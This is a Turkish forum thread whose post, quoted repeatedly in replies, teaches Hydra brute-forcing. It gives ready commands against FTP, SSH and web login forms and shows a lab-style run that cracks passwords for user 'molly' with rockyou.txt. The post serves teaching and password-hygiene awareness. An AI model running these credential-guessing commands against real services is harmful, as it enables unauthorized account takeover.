Hydra Nedir ? Nasıl Kullanılır ? Nasıl Kurulur? Hydra Komutları Hydra İle BruteForce

Öncelikle Hydra Nedir?
Hydra bir kaba kuvvet çevrimiçi şifre kırma programıdır; hızlı bir sistem giriş şifresi 'hacking' aracı.

Hydra'yı bir listeyi çalıştırmak ve bazı kimlik doğrulama hizmetlerini 'bruteforce' yapmak için kullanabiliriz.

Belirli bir hizmette (SSH, Web Uygulama Formu, FTP veya SNMP) birinin şifresini manuel olarak tahmin etmeye çalıştığınızı hayal edin - Hydra'yı bir şifre listesi üzerinden çalıştırabilir ve bu işlemi bizim için hızlandırarak doğru şifreyi belirleyerek hızlandırabiliriz.

Hydra, buradaki protokolleri zorlama yeteneğine sahiptir:
Asterisk, AFP, Cisco AAA, Cisco kimlik doğrulama, Cisco etkinleştirme, CVS, Firebird, FTP, HTTP-FORM-GET, HTTP-FORM-POST, HTTP-GET, HTTP-HEAD, HTTP -POST, HTTP-PROXY, HTTPS-FORM-GET, HTTPS-FORM-POST, HTTPS-GET, HTTPS-HEAD, HTTPS-POST, HTTP-Proxy, ICQ, IMAP, IRC, LDAP, MS-SQL, MYSQL, NCP , NNTP, Oracle Listener, Oracle SID, Oracle, PC-Anywhere, PCNFS, POP3, POSTGRES, RDP, Rexec, Rlogin, Rsh, RTSP, SAP / R3, SIP, SMB, SMTP, SMTP Enum, SNMP v1 + v2 + v3 , SOCKS5, SSH (v1 ve v2), SSHKEY, Subversion, Teamspeak (TS2), Telnet, VMware-Auth, VNC ve XMPP.

Bu, güçlü bir şifre kullanmanın önemini gösterir, eğer şifreniz yaygınsa, özel karakterler içermiyorsa ve / veya 8 karakterden fazla değilse tahmin edilme eğiliminde olacaktır. Yaygın şifreleri içeren 100 milyon şifre listesi mevcuttur, bu nedenle kullanıma hazır bir uygulama oturum açmak için kolay bir şifre kullandığında, bunu varsayılandan değiştirdiğinizden emin olun! Çoğu zaman CCTV kameraları ve web çerçeveleri varsayılan parola olarak admin: password'ü kullanır umarım bunu yapmıyorsunuz.

Hydra Kurulumu​

Kali Linux kullanıyorsanız, hydra önceden yüklenmiştir. Aksi takdirde buradan indirebilirsiniz: https://github.com/vanhauser-thc/thc-hydra

Hydra Komutları​

Hydra'ya geçirdiğimiz seçenekler, hangi hizmete (protokole) saldırdığımıza bağlıdır.
Örneğin, kullanıcı adı user ve parola listesi passlist.txt olarak FTP'ye bruteforce yapmak isteseydik, aşağıdaki komutu kullanırdık:
hydra -l user -P passlist.txt ftp://makineip

SSH​

hydra -l <username> -P <pass path> makineip -t 4 ssh

Web Formu Göndermek​

Hydra'yı web formlarını bruteforce için de kullanabiliriz, hangi tür isteklerin yapıldığını bildiğinizden emin olmalısınız - normalde GET veya POST yöntemleri kullanılır. İstek türlerini görmek için tarayıcınızın ağ sekmesini (geliştirici araçlarında) kullanabilir veya sadece kaynak kodunu görüntüleyebilirsiniz.

Örneğin POST oturum açma formunu kaba kuvvet uygulamak için örnek bir Hydra komutu

hydra -l <username> -P <wordlist> makineip http-post-form "/:username=^USER^&password=^PASS^:F=incorrect" -V


Hadi bir deneme yapalım





Evet Şimdi Seni Kırma vakti

hydra -l molly -P rockyou.txt 10.10.***.** http-post-form "/login:username=^USER^&password=^PASS^:incorrect" -f

[80][http-post-form] host: 10.10.***.** login: molly password: sunshine

Gördüğünüz Gibi Şifre rockyou.txt içinde bulunmakta ve çok kısa süre içinde bu işi hallettim

Birde SSH Servisine Deneyelim

hydra -l molly -P rockyou.txt 10.10.***.** ssh

[22][ssh] host: 10.10.***.** login: molly password: butterfly


Sorusu olan Bana pm atabilir Okudugunuz için teşekkürler

 

[CHARGE=60][/CHARGE] .

 

Öncelikle Hydra Nedir?
Hydra bir kaba kuvvet çevrimiçi şifre kırma programıdır; hızlı bir sistem giriş şifresi 'hacking' aracı.

Hydra'yı bir listeyi çalıştırmak ve bazı kimlik doğrulama hizmetlerini 'bruteforce' yapmak için kullanabiliriz.

Belirli bir hizmette (SSH, Web Uygulama Formu, FTP veya SNMP) birinin şifresini manuel olarak tahmin etmeye çalıştığınızı hayal edin - Hydra'yı bir şifre listesi üzerinden çalıştırabilir ve bu işlemi bizim için hızlandırarak doğru şifreyi belirleyerek hızlandırabiliriz.

Hydra, buradaki protokolleri zorlama yeteneğine sahiptir:
Asterisk, AFP, Cisco AAA, Cisco kimlik doğrulama, Cisco etkinleştirme, CVS, Firebird, FTP, HTTP-FORM-GET, HTTP-FORM-POST, HTTP-GET, HTTP-HEAD, HTTP -POST, HTTP-PROXY, HTTPS-FORM-GET, HTTPS-FORM-POST, HTTPS-GET, HTTPS-HEAD, HTTPS-POST, HTTP-Proxy, ICQ, IMAP, IRC, LDAP, MS-SQL, MYSQL, NCP , NNTP, Oracle Listener, Oracle SID, Oracle, PC-Anywhere, PCNFS, POP3, POSTGRES, RDP, Rexec, Rlogin, Rsh, RTSP, SAP / R3, SIP, SMB, SMTP, SMTP Enum, SNMP v1 + v2 + v3 , SOCKS5, SSH (v1 ve v2), SSHKEY, Subversion, Teamspeak (TS2), Telnet, VMware-Auth, VNC ve XMPP.

Bu, güçlü bir şifre kullanmanın önemini gösterir, eğer şifreniz yaygınsa, özel karakterler içermiyorsa ve / veya 8 karakterden fazla değilse tahmin edilme eğiliminde olacaktır. Yaygın şifreleri içeren 100 milyon şifre listesi mevcuttur, bu nedenle kullanıma hazır bir uygulama oturum açmak için kolay bir şifre kullandığında, bunu varsayılandan değiştirdiğinizden emin olun! Çoğu zaman CCTV kameraları ve web çerçeveleri varsayılan parola olarak admin: password'ü kullanır umarım bunu yapmıyorsunuz.

Hydra Kurulumu​

Kali Linux kullanıyorsanız, hydra önceden yüklenmiştir. Aksi takdirde buradan indirebilirsiniz: https://github.com/vanhauser-thc/thc-hydra

Hydra Komutları​

Hydra'ya geçirdiğimiz seçenekler, hangi hizmete (protokole) saldırdığımıza bağlıdır.
Örneğin, kullanıcı adı user ve parola listesi passlist.txt olarak FTP'ye bruteforce yapmak isteseydik, aşağıdaki komutu kullanırdık:
hydra -l user -P passlist.txt ftp://makineip

SSH​

hydra -l <username> -P <pass path> makineip -t 4 ssh

Web Formu Göndermek​

Hydra'yı web formlarını bruteforce için de kullanabiliriz, hangi tür isteklerin yapıldığını bildiğinizden emin olmalısınız - normalde GET veya POST yöntemleri kullanılır. İstek türlerini görmek için tarayıcınızın ağ sekmesini (geliştirici araçlarında) kullanabilir veya sadece kaynak kodunu görüntüleyebilirsiniz.

Örneğin POST oturum açma formunu kaba kuvvet uygulamak için örnek bir Hydra komutu

hydra -l <username> -P <wordlist> makineip http-post-form "/:username=^USER^&password=^PASS^:F=incorrect" -V


Hadi bir deneme yapalım



Ekli dosyayı görüntüle 16569

Evet Şimdi Seni Kırma vakti

hydra -l molly -P rockyou.txt 10.10.***.** http-post-form "/login:username=^USER^&password=^PASS^:incorrect" -f

[80][http-post-form] host: 10.10.***.** login: molly password: sunshine

Gördüğünüz Gibi Şifre rockyou.txt içinde bulunmakta ve çok kısa süre içinde bu işi hallettim

Birde SSH Servisine Deneyelim

hydra -l molly -P rockyou.txt 10.10.***.** ssh

[22][ssh] host: 10.10.***.** login: molly password: butterfly


Sorusu olan Bana pm atabilir Okudugunuz için teşekkürler

es

 

Öncelikle Hydra Nedir?
Hydra bir kaba kuvvet çevrimiçi şifre kırma programıdır; hızlı bir sistem giriş şifresi 'hacking' aracı.

Hydra'yı bir listeyi çalıştırmak ve bazı kimlik doğrulama hizmetlerini 'bruteforce' yapmak için kullanabiliriz.

Belirli bir hizmette (SSH, Web Uygulama Formu, FTP veya SNMP) birinin şifresini manuel olarak tahmin etmeye çalıştığınızı hayal edin - Hydra'yı bir şifre listesi üzerinden çalıştırabilir ve bu işlemi bizim için hızlandırarak doğru şifreyi belirleyerek hızlandırabiliriz.

Hydra, buradaki protokolleri zorlama yeteneğine sahiptir:
Asterisk, AFP, Cisco AAA, Cisco kimlik doğrulama, Cisco etkinleştirme, CVS, Firebird, FTP, HTTP-FORM-GET, HTTP-FORM-POST, HTTP-GET, HTTP-HEAD, HTTP -POST, HTTP-PROXY, HTTPS-FORM-GET, HTTPS-FORM-POST, HTTPS-GET, HTTPS-HEAD, HTTPS-POST, HTTP-Proxy, ICQ, IMAP, IRC, LDAP, MS-SQL, MYSQL, NCP , NNTP, Oracle Listener, Oracle SID, Oracle, PC-Anywhere, PCNFS, POP3, POSTGRES, RDP, Rexec, Rlogin, Rsh, RTSP, SAP / R3, SIP, SMB, SMTP, SMTP Enum, SNMP v1 + v2 + v3 , SOCKS5, SSH (v1 ve v2), SSHKEY, Subversion, Teamspeak (TS2), Telnet, VMware-Auth, VNC ve XMPP.

Bu, güçlü bir şifre kullanmanın önemini gösterir, eğer şifreniz yaygınsa, özel karakterler içermiyorsa ve / veya 8 karakterden fazla değilse tahmin edilme eğiliminde olacaktır. Yaygın şifreleri içeren 100 milyon şifre listesi mevcuttur, bu nedenle kullanıma hazır bir uygulama oturum açmak için kolay bir şifre kullandığında, bunu varsayılandan değiştirdiğinizden emin olun! Çoğu zaman CCTV kameraları ve web çerçeveleri varsayılan parola olarak admin: password'ü kullanır umarım bunu yapmıyorsunuz.

Hydra Kurulumu​

Kali Linux kullanıyorsanız, hydra önceden yüklenmiştir. Aksi takdirde buradan indirebilirsiniz: https://github.com/vanhauser-thc/thc-hydra

Hydra Komutları​

Hydra'ya geçirdiğimiz seçenekler, hangi hizmete (protokole) saldırdığımıza bağlıdır.
Örneğin, kullanıcı adı user ve parola listesi passlist.txt olarak FTP'ye bruteforce yapmak isteseydik, aşağıdaki komutu kullanırdık:
hydra -l user -P passlist.txt ftp://makineip

SSH​

hydra -l <username> -P <pass path> makineip -t 4 ssh

Web Formu Göndermek​

Hydra'yı web formlarını bruteforce için de kullanabiliriz, hangi tür isteklerin yapıldığını bildiğinizden emin olmalısınız - normalde GET veya POST yöntemleri kullanılır. İstek türlerini görmek için tarayıcınızın ağ sekmesini (geliştirici araçlarında) kullanabilir veya sadece kaynak kodunu görüntüleyebilirsiniz.

Örneğin POST oturum açma formunu kaba kuvvet uygulamak için örnek bir Hydra komutu

hydra -l <username> -P <wordlist> makineip http-post-form "/:username=^USER^&password=^PASS^:F=incorrect" -V


Hadi bir deneme yapalım



Ekli dosyayı görüntüle 16569

Evet Şimdi Seni Kırma vakti

hydra -l molly -P rockyou.txt 10.10.***.** http-post-form "/login:username=^USER^&password=^PASS^:incorrect" -f

[80][http-post-form] host: 10.10.***.** login: molly password: sunshine

Gördüğünüz Gibi Şifre rockyou.txt içinde bulunmakta ve çok kısa süre içinde bu işi hallettim

Birde SSH Servisine Deneyelim

hydra -l molly -P rockyou.txt 10.10.***.** ssh

[22][ssh] host: 10.10.***.** login: molly password: butterfly


Sorusu olan Bana pm atabilir Okudugunuz için teşekkürler

eline sağlık

 

eline sağlık

Eyw

 

Öncelikle Hydra Nedir?
Hydra bir kaba kuvvet çevrimiçi şifre kırma programıdır; hızlı bir sistem giriş şifresi 'hacking' aracı.

Hydra'yı bir listeyi çalıştırmak ve bazı kimlik doğrulama hizmetlerini 'bruteforce' yapmak için kullanabiliriz.

Belirli bir hizmette (SSH, Web Uygulama Formu, FTP veya SNMP) birinin şifresini manuel olarak tahmin etmeye çalıştığınızı hayal edin - Hydra'yı bir şifre listesi üzerinden çalıştırabilir ve bu işlemi bizim için hızlandırarak doğru şifreyi belirleyerek hızlandırabiliriz.

Hydra, buradaki protokolleri zorlama yeteneğine sahiptir:
Asterisk, AFP, Cisco AAA, Cisco kimlik doğrulama, Cisco etkinleştirme, CVS, Firebird, FTP, HTTP-FORM-GET, HTTP-FORM-POST, HTTP-GET, HTTP-HEAD, HTTP -POST, HTTP-PROXY, HTTPS-FORM-GET, HTTPS-FORM-POST, HTTPS-GET, HTTPS-HEAD, HTTPS-POST, HTTP-Proxy, ICQ, IMAP, IRC, LDAP, MS-SQL, MYSQL, NCP , NNTP, Oracle Listener, Oracle SID, Oracle, PC-Anywhere, PCNFS, POP3, POSTGRES, RDP, Rexec, Rlogin, Rsh, RTSP, SAP / R3, SIP, SMB, SMTP, SMTP Enum, SNMP v1 + v2 + v3 , SOCKS5, SSH (v1 ve v2), SSHKEY, Subversion, Teamspeak (TS2), Telnet, VMware-Auth, VNC ve XMPP.

Bu, güçlü bir şifre kullanmanın önemini gösterir, eğer şifreniz yaygınsa, özel karakterler içermiyorsa ve / veya 8 karakterden fazla değilse tahmin edilme eğiliminde olacaktır. Yaygın şifreleri içeren 100 milyon şifre listesi mevcuttur, bu nedenle kullanıma hazır bir uygulama oturum açmak için kolay bir şifre kullandığında, bunu varsayılandan değiştirdiğinizden emin olun! Çoğu zaman CCTV kameraları ve web çerçeveleri varsayılan parola olarak admin: password'ü kullanır umarım bunu yapmıyorsunuz.

Hydra Kurulumu​

Kali Linux kullanıyorsanız, hydra önceden yüklenmiştir. Aksi takdirde buradan indirebilirsiniz: https://github.com/vanhauser-thc/thc-hydra

Hydra Komutları​

Hydra'ya geçirdiğimiz seçenekler, hangi hizmete (protokole) saldırdığımıza bağlıdır.
Örneğin, kullanıcı adı user ve parola listesi passlist.txt olarak FTP'ye bruteforce yapmak isteseydik, aşağıdaki komutu kullanırdık:
hydra -l user -P passlist.txt ftp://makineip

SSH​

hydra -l <username> -P <pass path> makineip -t 4 ssh

Web Formu Göndermek​

Hydra'yı web formlarını bruteforce için de kullanabiliriz, hangi tür isteklerin yapıldığını bildiğinizden emin olmalısınız - normalde GET veya POST yöntemleri kullanılır. İstek türlerini görmek için tarayıcınızın ağ sekmesini (geliştirici araçlarında) kullanabilir veya sadece kaynak kodunu görüntüleyebilirsiniz.

Örneğin POST oturum açma formunu kaba kuvvet uygulamak için örnek bir Hydra komutu

hydra -l <username> -P <wordlist> makineip http-post-form "/:username=^USER^&password=^PASS^:F=incorrect" -V


Hadi bir deneme yapalım



Ekli dosyayı görüntüle 16569

Evet Şimdi Seni Kırma vakti

hydra -l molly -P rockyou.txt 10.10.***.** http-post-form "/login:username=^USER^&password=^PASS^:incorrect" -f

[80][http-post-form] host: 10.10.***.** login: molly password: sunshine

Gördüğünüz Gibi Şifre rockyou.txt içinde bulunmakta ve çok kısa süre içinde bu işi hallettim

Birde SSH Servisine Deneyelim

hydra -l molly -P rockyou.txt 10.10.***.** ssh

[22][ssh] host: 10.10.***.** login: molly password: butterfly


Sorusu olan Bana pm atabilir Okudugunuz için teşekkürler

eyvallah